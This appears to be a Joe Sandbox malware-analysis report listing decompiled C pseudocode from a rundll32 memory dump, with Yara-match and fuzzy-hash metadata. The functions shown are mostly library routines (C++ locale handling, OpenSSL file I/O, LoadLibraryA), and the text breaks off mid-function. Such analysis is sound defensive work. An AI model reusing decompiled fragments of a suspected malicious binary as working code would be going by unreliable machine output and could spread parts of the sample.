                                        0x21ef3019430
                                        0x21ef3019434
                                        0x21ef3019438
                                        0x21ef301943f
                                        0x21ef3019447
                                        0x21ef301944b
                                        0x21ef301944f
                                        0x21ef3019453
                                        0x21ef301945b
                                        0x21ef3019465
                                        0x21ef301946a
                                        0x21ef301946f
                                        0x21ef3019474
                                        0x21ef3019478
                                        0x21ef301947c
                                        0x21ef3019480
                                        0x21ef3019484
                                        0x21ef3019490
                                        0x21ef3019499
                                        0x21ef30194a1
                                        0x21ef30194a9
                                        0x21ef30194ae
                                        0x21ef30194b4
                                        0x21ef30194c1
                                        0x21ef30194d0
                                        0x21ef30194d7
                                        0x21ef30194df
                                        0x21ef30194e5
                                        0x21ef30194eb
                                        0x21ef3019502
                                        0x21ef3019511
                                        0x21ef3019523
                                        0x21ef3019531
                                        0x21ef3019544
                                        0x21ef3019555
                                        0x21ef301955a
                                        0x21ef3019569
                                        0x21ef3019571
                                        0x21ef301957b
                                        0x21ef3019580
                                        0x21ef3019584
                                        0x21ef301958c
                                        0x21ef3019590
                                        0x21ef3019594
                                        0x21ef301959c
                                        0x21ef30195a4
                                        0x21ef30195ac
                                        0x21ef30195b4
                                        0x21ef30195b8
                                        0x21ef30195bf
                                        0x21ef30195c6
                                        0x21ef30195cd
                                        0x21ef30195d4
                                        0x21ef30195db
                                        0x21ef30195e5
                                        0x21ef30195e8
                                        0x21ef30195f1
                                        0x21ef30195f6
                                        0x21ef30195fa
                                        0x21ef3019601
                                        0x21ef3019607
                                        0x21ef3019612
                                        0x21ef3019623
                                        0x21ef3019628
                                        0x21ef301962c
                                        0x21ef3019634
                                        0x21ef301963a
                                        0x21ef3019641
                                        0x21ef3019648
                                        0x21ef301964e
                                        0x21ef3019657
                                        0x21ef301965f
                                        0x21ef3019666
                                        0x21ef3019673
                                        0x21ef301967c
                                        0x21ef3019682
                                        0x21ef3019689
                                        0x21ef3019690
                                        0x21ef3019692
                                        0x21ef30196a7

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Lockitstd::_$std::locale::_$Lockit::_Lockit::~_$Init$ExceptionLocimpLocimp::_New_SetgloballocaleThrowYarn
                                        • String ID:
                                        • API String ID: 2068841532-0
                                        • Opcode ID: eb7ad89f49aa584f082ae8ad4cc002c2f8a81b6d389ffc47559d48b210139343
                                        • Instruction ID: 4d5ca8b2034ed96f8db7a47a16c00cbedd90d49d06de13f44cfa74f8046e19ab
                                        • Opcode Fuzzy Hash: eb7ad89f49aa584f082ae8ad4cc002c2f8a81b6d389ffc47559d48b210139343
                                        • Instruction Fuzzy Hash: BAA14732201F4496DB10CF2AE98869D77B4F798B98B568226CF9D43B60EF39D076C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3121BA4 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E0000021E21EF3121BA4(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
				void* _v8;
				char _v16;
				intOrPtr* _v32;
				char _v40;
				void* __rdi;
				void* _t17;
				intOrPtr* _t43;
				void* _t55;

				_a8 = __rbx;
				_a24 = __rsi;
				_a32 = r9w;
				_t55 = __rdx;
				if (__rdx != 0) goto 0xf3121bda;
				if (__r8 == 0) goto 0xf3121bda;
				if (__rcx == 0) goto 0xf3121bd3;
				 *__rcx =  *__rcx & __edx;
				goto 0xf3121c69;
				if (__rcx == 0) goto 0xf3121be2;
				 *__rcx =  *__rcx | 0xffffffff;
				if (__r8 - 0x7fffffff <= 0) goto 0xf3121bfe;
				_t17 = E0000021E21EF3118984(__rax);
				 *__rax = 0x16;
				E0000021E21EF3111BC8(_t17);
				goto 0xf3121c67;
				E0000021E21EF3111664(__rax, __rcx,  &_v40, _a40);
				_t43 = _v32;
				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0xf3121c98;
				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0xf3121c7b;
				if (_t55 == 0) goto 0xf3121c48;
				if (__r8 == 0) goto 0xf3121c48;
				E0000021E21EF310E410(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
				E0000021E21EF3118984(_t43);
				 *_t43 = 0x2a;
				if (_v16 == 0) goto 0xf3121c67;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				return 0x2a;
			}











                                        0x21ef3121ba4
                                        0x21ef3121ba9
                                        0x21ef3121bae
                                        0x21ef3121bbc
                                        0x21ef3121bc5
                                        0x21ef3121bca
                                        0x21ef3121bcf
                                        0x21ef3121bd1
                                        0x21ef3121bd5
                                        0x21ef3121bdd
                                        0x21ef3121bdf
                                        0x21ef3121be9
                                        0x21ef3121beb
                                        0x21ef3121bf5
                                        0x21ef3121bf7
                                        0x21ef3121bfc
                                        0x21ef3121c0b
                                        0x21ef3121c10
                                        0x21ef3121c1d
                                        0x21ef3121c2f
                                        0x21ef3121c34
                                        0x21ef3121c39
                                        0x21ef3121c43
                                        0x21ef3121c48
                                        0x21ef3121c52
                                        0x21ef3121c59
                                        0x21ef3121c60
                                        0x21ef3121c7a

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                        • String ID:
                                        • API String ID: 4141327611-0
                                        • Opcode ID: 49d77ae0b775df07605cd79664d0e3d06cc87af61a22bad7434ff002173df99d
                                        • Instruction ID: fb291615a78600fce27f9e4bd39b5f25e2c0b7676d58003c859e00603e1e2908
                                        • Opcode Fuzzy Hash: 49d77ae0b775df07605cd79664d0e3d06cc87af61a22bad7434ff002173df99d
                                        • Instruction Fuzzy Hash: 2E41903620478086FF75DF5198493EBA2F0EBA1B94F2681349E9587ED6DA3DC853CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3032F99 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 29%
                                        			E0000021E21EF3032F99(signed int __ebx, signed int __edi, void* __rax, void* __rbx, long long __rsi, void* __rbp, void* __r8, void* __r10, void* __r14, long long _a32, long long _a40, void* _a64, char _a72, void* _a80, void* _a88) {
				long _t45;
				long _t49;
				signed int _t55;
				signed int _t66;
				long long _t81;
				void* _t88;
				void* _t89;
				long long _t92;
				signed short* _t99;
				signed short* _t100;
				long long _t102;
				long long* _t110;

				_t104 = __rbp;
				_t102 = __rsi;
				_t82 = __rbx;
				_t66 = __edi;
				E0000021E21EF3033250(__rax, __rsi);
				 *(__rsi + 0x1c) = __edi & __ebx;
				if ((dil & 0x00000008) == 0) goto 0xf3032fd1;
				r8d = 4;
				if ((dil & 0x00000002) == 0) goto 0xf3032fc8;
				goto 0xf303300e;
				goto 0xf303300e;
				if ((__edi & 0x00000006) != 6) goto 0xf3032fe3;
				goto 0xf3033003;
				if ((dil & 0x00000004) == 0) goto 0xf3032ff2;
				goto 0xf3033003;
				if ((dil & 0x00000002) == 0) goto 0xf30330d2;
				r8d = 4;
				E0000021E21EF3025650(__rax,  &_a72, "r", __r8, __r10);
				_t88 =  &_a72 - 1;
				if ((dil & 0x00000010) != 0) goto 0xf3033034;
				_t89 = _t88 + 1;
				if ( *((char*)(_t88 + 1)) != 0) goto 0xf3033021;
				goto 0xf3033045;
				if ( *((char*)(_t89 + 1)) != 0) goto 0xf3033034;
				 *((short*)(_t89 + 1)) = "t" & 0x0000ffff;
				0xf304d840();
				if (__rax != 0) goto 0xf30330bc;
				_t45 = GetLastError();
				_a32 = 0x124;
				r8d = _t45;
				E0000021E21EF30222D0(2, __ebx, __rax, __rax, __rbx, __r14,  &_a72, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				_a40 = "\')";
				_t110 = "\',\'";
				_t81 =  &_a72;
				_t99 = "fopen(\'";
				_a32 = _t81;
				E0000021E21EF3021640(5, _t81, _t99, __r14, _t110);
				_a32 = 0x126;
				goto 0xf303313b;
				 *((long long*)(_t102 + 0x30)) = _t81;
				_t92 = _t102;
				 *((intOrPtr*)(_t102 + 0x18)) = __ebx;
				0xf3022a70();
				goto 0xf3033157;
				_a32 = 0x118;
				r8d = 0x65;
				if (__r14 == 0) goto 0xf3033157;
				 *_t110 = _t92;
				_t55 =  *(_t102 + 0x1c);
				goto 0xf3033157;
				 *(_t102 + 0x1c) = _t66;
				if (fflush() != 0xffffffff) goto 0xf3033157;
				_t49 = GetLastError();
				_a32 = 0x140;
				r8d = _t49;
				_t31 = _t99 - 0x10; // 0x2
				E0000021E21EF30222D0(_t31, 0x12, fflush() - 0xffffffff, _t81, _t82, _t92, _t99, _t102, _t104, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				_t100 = "fflush()";
				E0000021E21EF3021640(_t55, _t81, _t100, __r14, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				_a32 = 0x142;
				r8d = 2;
				_t33 = _t100 - 0x54; // 0x20
				E0000021E21EF30222D0(_t33, 0x74, fflush() - 0xffffffff, _t81, _t82, _t92, _t100, _t102, _t104, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				return 0;
			}















                                        0x21ef3032f99
                                        0x21ef3032f99
                                        0x21ef3032f99
                                        0x21ef3032f99
                                        0x21ef3032f9c
                                        0x21ef3032fa5
                                        0x21ef3032fac
                                        0x21ef3032fb3
                                        0x21ef3032fbd
                                        0x21ef3032fc6
                                        0x21ef3032fcf
                                        0x21ef3032fd8
                                        0x21ef3032fe1
                                        0x21ef3032fe7
                                        0x21ef3032ff0
                                        0x21ef3032ff6
                                        0x21ef3033003
                                        0x21ef303300e
                                        0x21ef3033018
                                        0x21ef303301f
                                        0x21ef3033025
                                        0x21ef3033029
                                        0x21ef3033032
                                        0x21ef303303c
                                        0x21ef3033045
                                        0x21ef3033050
                                        0x21ef3033058
                                        0x21ef303305a
                                        0x21ef3033067
                                        0x21ef303306f
                                        0x21ef3033079
                                        0x21ef3033088
                                        0x21ef303308d
                                        0x21ef3033094
                                        0x21ef303309e
                                        0x21ef30330a5
                                        0x21ef30330aa
                                        0x21ef30330af
                                        0x21ef30330b7
                                        0x21ef30330be
                                        0x21ef30330c2
                                        0x21ef30330c5
                                        0x21ef30330c8
                                        0x21ef30330cd
                                        0x21ef30330d2
                                        0x21ef30330da
                                        0x21ef30330e5
                                        0x21ef30330e7
                                        0x21ef30330ec
                                        0x21ef30330ef
                                        0x21ef30330f1
                                        0x21ef30330fe
                                        0x21ef3033100
                                        0x21ef303310b
                                        0x21ef3033113
                                        0x21ef303311d
                                        0x21ef3033120
                                        0x21ef3033125
                                        0x21ef303312e
                                        0x21ef3033133
                                        0x21ef303313b
                                        0x21ef303314d
                                        0x21ef3033150
                                        0x21ef303316e

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID: ','$..\..\openssl-1.1.0f\crypto\bio\bss_file.c$fopen('
                                        • API String ID: 1452528299-1553173387
                                        • Opcode ID: a4f32deb7fbc851700f2b082ecaef4f55a488856d07c6e0b130c4b594f97a7e0
                                        • Instruction ID: d59471a8a47b040321ddf524e7e83f3c023fc607628e4305a069f75c16239f7a
                                        • Opcode Fuzzy Hash: a4f32deb7fbc851700f2b082ecaef4f55a488856d07c6e0b130c4b594f97a7e0
                                        • Instruction Fuzzy Hash: 36415832304A4185FF64CF09DC893EBA7A1A3A5750F864117DE8D86EA5EB7DC64BC740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3000570 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0000021E21EF3000570(long long __rbx, long long* __rcx, signed long long __rdx, long long _a8, long long _a16, long long _a24) {
				long long _v40;
				void* _t22;
				void* _t23;
				long long _t32;
				long long _t38;
				signed int _t41;
				signed long long _t44;
				long long _t46;
				long long* _t47;
				signed long long _t48;

				_t44 = __rdx;
				_a16 = __rdx;
				_v40 = 0xfffffffe;
				_a8 = __rbx;
				_t48 = __rdx;
				_t47 = __rcx;
				if (__rdx != 0) goto 0xf300059a;
				goto 0xf30005ed;
				if (__rdx - 0xffffffff <= 0) goto 0xf30005af;
				E0000021E21EF310A170(0xffffffff);
				asm("int3");
				_t41 = _t44 * 8;
				if (_t41 - 0x1000 < 0) goto 0xf30005e5;
				_t32 = _t41 + 0x27;
				if (_t32 - _t41 > 0) goto 0xf30005cf;
				E0000021E21EF310A170(_t32);
				asm("int3");
				E0000021E21EF310B674(_t32, _t32);
				_t6 = _t32 + 0x27; // 0x27
				 *((long long*)((_t6 & 0xffffffe0) - 8)) = _t32;
				goto 0xf30005ed;
				_t22 = E0000021E21EF310B674(_t32, _t32);
				_t38 = _t32;
				_a24 = _t38;
				_t23 = E0000021E21EF3006760(_t22,  *_t47,  *((intOrPtr*)(_t47 + 8)), _t38);
				_t46 =  *_t47;
				if (_t46 == 0) goto 0xf3000625;
				0xf30006e0();
				 *((long long*)(_t47 + 0x10)) = _t38 + _t48 * 8;
				 *((long long*)(_t47 + 8)) = _t38 + ( *((intOrPtr*)(_t47 + 8)) - _t46 >> 3) * 8;
				 *_t47 = _t38;
				return _t23;
			}













                                        0x21ef3000570
                                        0x21ef3000570
                                        0x21ef300057d
                                        0x21ef3000586
                                        0x21ef300058b
                                        0x21ef300058e
                                        0x21ef3000594
                                        0x21ef3000598
                                        0x21ef30005a7
                                        0x21ef30005a9
                                        0x21ef30005ae
                                        0x21ef30005af
                                        0x21ef30005be
                                        0x21ef30005c0
                                        0x21ef30005c7
                                        0x21ef30005c9
                                        0x21ef30005ce
                                        0x21ef30005d2
                                        0x21ef30005d7
                                        0x21ef30005df
                                        0x21ef30005e3
                                        0x21ef30005e5
                                        0x21ef30005ea
                                        0x21ef30005ed
                                        0x21ef30005fc
                                        0x21ef3000602
                                        0x21ef3000613
                                        0x21ef3000620
                                        0x21ef3000629
                                        0x21ef3000631
                                        0x21ef3000635
                                        0x21ef3000645

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: 89cfd26d850f7974e19e0b8867d82d8511561a90e7ace9660613bfa6d740ea21
                                        • Instruction ID: cbaca4fd1c05cfd30aab1f1e8cf67055470712ef3547f39d891addc41e4bf341
                                        • Opcode Fuzzy Hash: 89cfd26d850f7974e19e0b8867d82d8511561a90e7ace9660613bfa6d740ea21
                                        • Instruction Fuzzy Hash: 61216DF2201B8095EE149B65E9483CE62A2B7947F0F5587269F7D03BD9DB38C562C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30182C8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E0000021E21EF30182C8(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a24) {
				void* _v8;
				char _v112;
				char _v144;
				long long _v152;
				void* _t21;
				void* _t25;
				long long _t31;
				long long* _t35;
				intOrPtr _t38;
				long long _t46;
				long long _t50;
				void* _t53;

				_t31 = _t50;
				_v152 = 0xfffffffe;
				 *((long long*)(_t31 + 0x10)) = __rbx;
				 *((long long*)(_t31 + 0x20)) = __rsi;
				_t35 = __rcx;
				 *(_t31 + 8) =  *(_t31 + 8) & 0x00000000;
				if (__rcx == 0) goto 0xf3018389;
				if ( *__rcx != 0) goto 0xf3018389;
				E0000021E21EF310B674(_t31, __rcx);
				_t46 = _t31;
				_a24 = _t31;
				_t38 =  *((intOrPtr*)(__rdx + 8));
				if (_t38 != 0) goto 0xf3018328;
				goto 0xf3018335;
				if ( *((intOrPtr*)(_t38 + 0x28)) != 0) goto 0xf3018335;
				E0000021E21EF3018114(_t31, _t35,  &_v112, _t38 + 0x30);
				_a8 = 1;
				 *_t46 = 0xf319e168;
				 *(_t46 + 8) =  *(_t46 + 8) & 0x00000000;
				 *_t46 = 0xf319e1f8;
				_t21 = E0000021E21EF310A8FC(0xf319e1f8,  &_v144, _t38 + 0x30, _t53);
				asm("movups xmm0, [eax]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [edi+0x20], xmm1");
				 *_t35 = _t46;
				E0000021E21EF30181AC(_t21, _t25,  &_v112);
				return 2;
			}















                                        0x21ef30182c8
                                        0x21ef30182d3
                                        0x21ef30182dc
                                        0x21ef30182e0
                                        0x21ef30182e7
                                        0x21ef30182ea
                                        0x21ef30182f1
                                        0x21ef30182fb
                                        0x21ef3018306
                                        0x21ef301830b
                                        0x21ef301830e
                                        0x21ef3018316
                                        0x21ef301831d
                                        0x21ef3018326
                                        0x21ef301832f
                                        0x21ef301833a
                                        0x21ef3018340
                                        0x21ef3018352
                                        0x21ef3018355
                                        0x21ef3018360
                                        0x21ef3018368
                                        0x21ef301836d
                                        0x21ef3018370
                                        0x21ef3018374
                                        0x21ef3018378
                                        0x21ef301837c
                                        0x21ef3018384
                                        0x21ef30183a2

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Locinfostd::_$GetctypeLocinfo::_Locinfo::~_
                                        • String ID:
                                        • API String ID: 1079120975-0
                                        • Opcode ID: 5e6238963374fccf7760cf20ed8fec3710a42fc4aad9a7a9750fee317ffc85ba
                                        • Instruction ID: f3e1060c41c845e394add470a78ed2416de7331bee63e7521c9c47e4da2ab59d
                                        • Opcode Fuzzy Hash: 5e6238963374fccf7760cf20ed8fec3710a42fc4aad9a7a9750fee317ffc85ba
                                        • Instruction Fuzzy Hash: EE216D32601B8091EF249B14E9487DA73B4F3A47A4F458322DF5C43B96EB3CC692C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE5C20 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FE5C20(void* __rcx, void* __rdx) {

				if (__rcx != 0) goto 0xf2fe5c33;
				return 0;
			}



                                        0x21ef2fe5c2a
                                        0x21ef2fe5c32

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d37bafe79ab884e732c02c6084ace85d5202ea00b8b743c5c86d92538d85b9c
                                        • Instruction ID: a9b45c38ae442bb2dbd32a30a92cdd0f0c61029c30cd30b7214ab4b50c82514b
                                        • Opcode Fuzzy Hash: 0d37bafe79ab884e732c02c6084ace85d5202ea00b8b743c5c86d92538d85b9c
                                        • Instruction Fuzzy Hash: 75F09062B62A0244EC19A3798C7D3ED11A017A4770E810B609E3E11FD1EA2CC1838380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301C1EC Relevance: 6.0, APIs: 4, Instructions: 49librarystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 18%
                                        			E0000021E21EF301C1EC(long long __rbx, void* __rcx, signed long long* __rdx, long long __rsi, long long _a24, long long _a32) {
				void* _v8;
				signed long long _v24;
				char _v280;
				void* __rdi;
				struct HINSTANCE__* _t16;
				void* _t17;
				void* _t18;
				void* _t21;
				void* _t22;
				signed long long _t27;
				signed long long _t28;
				void* _t47;
				void* _t52;
				void* _t55;
				void* _t56;

				_a24 = __rbx;
				_a32 = __rsi;
				_t27 =  *0xf3203000; // 0x1fc8e4a4378e
				_t28 = _t27 ^ _t52 - 0x00000130;
				_v24 = _t28;
				r8d = 0x100;
				E0000021E21EF310E410(_t18, 0, _t21, _t22,  &_v280, __rdx, _t47, _t55);
				lstrcpyA(??, ??);
				__imp__StrChrA();
				if (_t28 != 0) goto 0xf301c252;
				goto 0xf301c28b;
				 *_t28 = 0;
				_t16 = LoadLibraryA(??);
				if (_t28 == 0) goto 0xf301c24e;
				if ( *((char*)(_t28 + 1)) != 0x23) goto 0xf301c27d;
				__imp__StrToIntA();
				 *__rdx = _t28;
				_t17 = E0000021E21EF301C2B0(0x2e, __rdx, _t16, _t56);
				E0000021E21EF310C290();
				return _t17;
			}


















                                        0x21ef301c1ec
                                        0x21ef301c1f1
                                        0x21ef301c1fe
                                        0x21ef301c205
                                        0x21ef301c208
                                        0x21ef301c21d
                                        0x21ef301c223
                                        0x21ef301c230
                                        0x21ef301c240
                                        0x21ef301c24c
                                        0x21ef301c250
                                        0x21ef301c257
                                        0x21ef301c25d
                                        0x21ef301c269
                                        0x21ef301c26e
                                        0x21ef301c274
                                        0x21ef301c280
                                        0x21ef301c286
                                        0x21ef301c296
                                        0x21ef301c2af

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoadlstrcpy
                                        • String ID:
                                        • API String ID: 304781146-0
                                        • Opcode ID: 9ca075ae90b82dc8fddcd07e3df318c8d222eca4c1415a003c80a3802afae1d1
                                        • Instruction ID: 3a3b3390072e301c7e2388db6ada611a6c4653fa3bbed362a4df0c6e6ff94f17
                                        • Opcode Fuzzy Hash: 9ca075ae90b82dc8fddcd07e3df318c8d222eca4c1415a003c80a3802afae1d1
                                        • Instruction Fuzzy Hash: 8A110D36215A8092EF21DB21EC583DAB3A0B7ADB84F568122DE8D47B69DF3CC556C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3126870 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E0000021E21EF3126870(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
				void* _t4;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t23;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t33;

				_t29 = __rdx;
				_t27 = __rcx;
				_t25 = __rbx;
				_t23 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t11 =  *0xf32032b0; // 0x7
				if (_t11 == 0xffffffff) goto 0xf312689a;
				_t4 = E0000021E21EF3126F7C(_t11, __rax, __rbx);
				if (__rax != 0) goto 0xf31268db;
				E0000021E21EF3122114(_t4, _t27, _t29);
				_t32 = _t23;
				if (_t23 != 0) goto 0xf31268ba;
				E0000021E21EF3124EE0(_t23, _t27);
				goto 0xf31268f6;
				_t14 =  *0xf32032b0; // 0x7
				if (E0000021E21EF3126FD4(_t14, _t23, _t25, _t23, _t33) == 0) goto 0xf31268b3;
				E0000021E21EF31265DC(_t32, _t23);
				_t9 = E0000021E21EF3124EE0(_t23, _t32);
				if (_t32 == 0) goto 0xf31268f6;
				SetLastError(??);
				return _t9;
			}












                                        0x21ef3126870
                                        0x21ef3126870
                                        0x21ef3126870
                                        0x21ef3126870
                                        0x21ef3126870
                                        0x21ef312687a
                                        0x21ef3126880
                                        0x21ef312688b
                                        0x21ef312688d
                                        0x21ef3126898
                                        0x21ef31268a4
                                        0x21ef31268a9
                                        0x21ef31268af
                                        0x21ef31268b3
                                        0x21ef31268b8
                                        0x21ef31268ba
                                        0x21ef31268cd
                                        0x21ef31268cf
                                        0x21ef31268d6
                                        0x21ef31268de
                                        0x21ef31268e2
                                        0x21ef31268f5

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$abort
                                        • String ID:
                                        • API String ID: 1447195878-0
                                        • Opcode ID: 979b99e8c2369e89e4b2a2efa61d5ab4c60160ca73a09f3242b90a8b4a1fc751
                                        • Instruction ID: e8bbeb0e95458db8620f9918a6f99ddd0cdba76a914a2194aabb6d8e02eb935d
                                        • Opcode Fuzzy Hash: 979b99e8c2369e89e4b2a2efa61d5ab4c60160ca73a09f3242b90a8b4a1fc751
                                        • Instruction Fuzzy Hash: E001843430174046FE79A331AE5D3EB21F29B78BD0F164128AE1A02FC6EE6CC857C200
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEF3B0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CriticalDeleteSection
                                        • String ID:
                                        • API String ID: 2166061224-0
                                        • Opcode ID: 33f892d42eef6fcb9a662957687bdcbb0d5a53a28e26da64c28067adbcd5383d
                                        • Instruction ID: eebff00db7e657b92deb9746f60ee8e9b33a103363adb4dd52a67c61507680ac
                                        • Opcode Fuzzy Hash: 33f892d42eef6fcb9a662957687bdcbb0d5a53a28e26da64c28067adbcd5383d
                                        • Instruction Fuzzy Hash: FB018F32201A0185FF109F20E9483AE6370FB96FA4F564320CE6E53AA8DF2CC4A6C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE88E0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FE88E0(void* __rdx) {

				if (__rdx != 0) goto 0xf2fe88f2;
				return 0;
			}



                                        0x21ef2fe88e7
                                        0x21ef2fe88f1

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bf691473c3dc8e1f1a1c1771e97749a043232d717cb8ecec532a7da6f68d384
                                        • Instruction ID: 16e0d9fbe94d6ebc6c3e5b9b8432215f6144abb5e022caa6e1cc3db8886e442a
                                        • Opcode Fuzzy Hash: 0bf691473c3dc8e1f1a1c1771e97749a043232d717cb8ecec532a7da6f68d384
                                        • Instruction Fuzzy Hash: 1BF030B2B6264185ED19F315889E3AD01A067B8BB0F9107649E3E46BE1EE1CC5978340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF312803C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 83%
                                        			E0000021E21EF312803C(void* __edx, void* __edi, void* __esp, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v48;
				intOrPtr _v56;
				long long _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				long long _v104;
				void* _t62;
				void* _t65;
				void* _t69;
				char _t70;
				char _t73;
				signed char _t75;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				signed int _t96;
				void* _t124;
				intOrPtr* _t139;
				char* _t143;
				long long _t171;
				signed long long _t174;
				intOrPtr* _t178;
				char* _t179;
				signed long long _t184;
				void* _t185;
				signed long long _t192;
				signed long long _t194;
				signed long long _t197;
				signed long long _t201;
				intOrPtr* _t202;
				char* _t203;
				intOrPtr* _t204;
				char* _t205;
				void* _t206;
				char* _t208;
